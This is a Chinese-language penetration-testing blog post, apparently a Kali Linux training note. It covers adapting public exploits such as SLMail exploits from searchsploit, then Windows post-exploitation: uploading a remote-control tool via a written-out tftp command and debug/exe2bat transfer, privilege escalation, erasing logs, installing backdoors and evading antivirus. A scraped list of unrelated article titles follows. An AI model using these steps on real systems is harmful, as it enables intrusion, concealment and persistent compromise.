网上公开的exp代码,选择可信赖的exp源,exploit-db,securityfocus,searchsploit,有能力修改exp(python,perl,ruby,c,c++.......)

类unix坏境下编译

返回地址和环境不符合

反弹shell硬编码了回链IP地址

缓冲区偏移量与我们的环境不符

目标IP硬编码

如下测试

查找slmail的exp

把exp复制到当前目录下进行修改测试

vim 638.py

vim 643.c

避免有害的exp,避免一锤子测试,满足不同环境需要,了解漏洞远离,修改溢出代码

漏洞利用后阶段:

上传工具(linux-----netcat----curl---wget。windows-----缺少预装的下载工具)

提权

擦除攻击痕迹(中间件日志,系统日志)

安装后门(dump密码,内网渗透)

后漏洞利用阶段(最大的挑战-----杀软,使用合法的远控)

windows命令行不方便操作,最好能把远程控制的软件上传到服务器上,方便后续操作

例如使用ftp来传输远控(ftp就不演示了,简单)

xp,03默认安装了,08需要单独添加,而且经常被边界防火墙过滤

思路就是在kali生成一个远控,或者其他更好的工具,本机开启tftp服务,在windows命令行下下载kali本机的远程控制工具(win:tftp -i 192.168.1.10 get xxsec.exe)

使用debug传输

汇编,反汇编,16进制dump工具,一次只能传输64k字节,可以使用upx压缩文件

用exe2bat把二进制转换成16进制的表示(exe2bat是windows程序,要用wine来执行)

exe2bat会把所有代码都生成好,复制好这些代码,除了最后两行,最后两行要在debug上操作

把复制好的代码粘贴到windows的shell上,这时dir查看一下,能看到一个123.hexdir的文件

然后到debug了,把x.txt的倒数第二行粘贴到windows的shell里面执行(123.hex作为输入,传输给debug)

完成后,dir查看会多出来一个1.DLL的文件

然后对它进行重命名

再次dir查看,远控工具就上传上去了

友情链接 http://www.cnblogs.com/klionsec

http://www.cnblogs.com/l0cm

http://www.cnblogs.com/Anonyaptxxx

http://www.feiyusafe.cn

转载于:https://www.cnblogs.com/Hydraxx/p/10427007.html

kali linux之选择和修改exp与windows后渗透相关推荐

  1. Kali Linux 2020.1快速修改root用户密码

    Kali Linux 2020.1快速修改root用户密码 安装Kali Linux 2020.1系统过程中,将要求创建一个普通用户.而且,在安装过程中没有设置过root密码.由于大部分软件需要roo ...

  2. kali linux子远程桌面,适用于kali linux的远程桌面开启方法(从windows xp 远程登录到kali linux )...

    为了解决Windows远程桌面访问Ubuntu 12.04 之一 中提到的VNC远程桌面的缺点(见http://www.linuxidc.com/Linux/2012-07/64801.htm),我们 ...

  3. kali linux怎么远程桌面,适用于kali linux的远程桌面开启方法(从windows xp 远程登录到kali linux )...

    适用于kali linux的远程桌面开启方法(从windows xp 远程登录到kali linux ) 适用于kali linux的远程桌面开启方法(从windows xp 远程登 录到kali l ...

  4. kail linux稳定版本,Kali Linux 2020.3 稳定版已发布 更新后新功能概览

    Kali Linux 2020.3稳定版已发布,新版带来了许多令人印象深刻的更新,例如引入 zsh,并宣布从 bash 切换至 zsh 的计划(目前仍然默认使用 bash,2020.4 将默认使用 z ...

  5. linux 系统命令被后门修改_Linux、Windows权限维持常用后门学习总结

    前言 在上周做的变种DDG挖矿木马-watchdogs应急响应中,攻击者使用了预加载来劫持ps.top等系统命令,没有提及具体的排查手段,借着这篇文章来详细解释下,并总结下Linux.Windows下 ...

  6. Kali linux 学习笔记(四十二)Web渗透——扫描工具之Arachni 2020.3.19

    前言 Arachni 一个功能完整的模块化高性能Ruby框架,旨在帮助渗透测试人员和管理员评估现代Web应用程序的安全性. 它是免费的,其源代码公开并可供审阅. 它是多平台的,支持所有主要操作系统(M ...

  7. Kali linux 学习笔记(三十四)无线渗透——WPA攻击(PSK破解、AIROLIB、JTR、cowpatty、pyrit) 2020.3.13

    前言 本节学习对WPA的攻击 主要有PSK攻击和AIROLIB.JTR.cowpatty.pyrit等工具的使用 1.WPA PSK攻击 WPA不存在WEP的弱点 只能基于字典暴力破解 PSK破解过程 ...

  8. Kali linux 学习笔记(三十五)无线渗透——WPS攻击 2020.3.13

    前言 WPS(wireless protected setup) wifi联盟2006年开发的技术 路由器和网卡各按一个键就能接入无线 PIN码分为前后两段各4位 1.安全漏洞 2011年发现接入发起 ...

  9. Kali Linux 从入门到精通(十)-漏洞挖掘之缓冲区溢出

    Kali Linux 从入门到精通(十)-漏洞挖掘之缓冲区溢出 程序漏洞从哪里来? 罪恶的根源:变量 数据与代码边界不清(注入攻击) 最简漏洞原理-shell 脚本漏洞(本质:输入数据本身,程序本身没 ...

最新文章

  1. Web前端——字体规范
  2. 【Linux】一步一步学Linux——enable命令(212)
  3. 配对碱基链(信息学奥赛一本通-T1135)
  4. 前端错误捕获终级方案
  5. linux基础学习【6】
  6. 【Android】安卓闪电复习
  7. pe系统如何读取手机_在酷安你甚至可以学到如何用手机充当启动盘进PE(多图警告)...
  8. 《ShowYou数组代码》第38题:对数组元素进行排序
  9. Python中的时间序列数据可视化的完整指南
  10. Python实现供应链数据分析
  11. opera安装java插件_欧朋浏览器Opera插件安装指南
  12. 域名过期导致的问题-研究DNS相关知识
  13. .so文件移动游戏破解范例
  14. Linkage Mapper 之 Barrier Mapper 功能解析(含实际案例分析)
  15. table.on('tool(test) test值是什么
  16. EDA软件常用技巧-SCL配置
  17. java 0x03 和0x0a
  18. 在树莓派上安装windows 10arm操作系统
  19. GridView 自动排序
  20. 一月三万用户,我的迅载网盘运营经验

热门文章

  1. Fail to get tape drive(tsm) inventory
  2. android开发:Android 中自定义属性(attr.xml,TypedArray)的使用
  3. mysql优于oracle的地方_MYSQL转为ORACLE要注意的地方
  4. 前端成功调用后端接口,返回值却报404
  5. springBoot 2.2.6 项目中html页面样式效果丢失
  6. data spring 指定时区_今天的工作内容:Spring Boot 2.X整合Spring-cache
  7. 【Vegas原创】Exchange报550 5.7.1 Unable to relay for …错误的分析
  8. 01背包和完全背包 的完整讲解版 包含 一维数组实现 和二维数组实现题目
  9. Oracle 分析函数的使用(主要是rollup用法)
  10. 军营中重重打击之后,我变了一个人(中)--我成为程序员所经历的(四)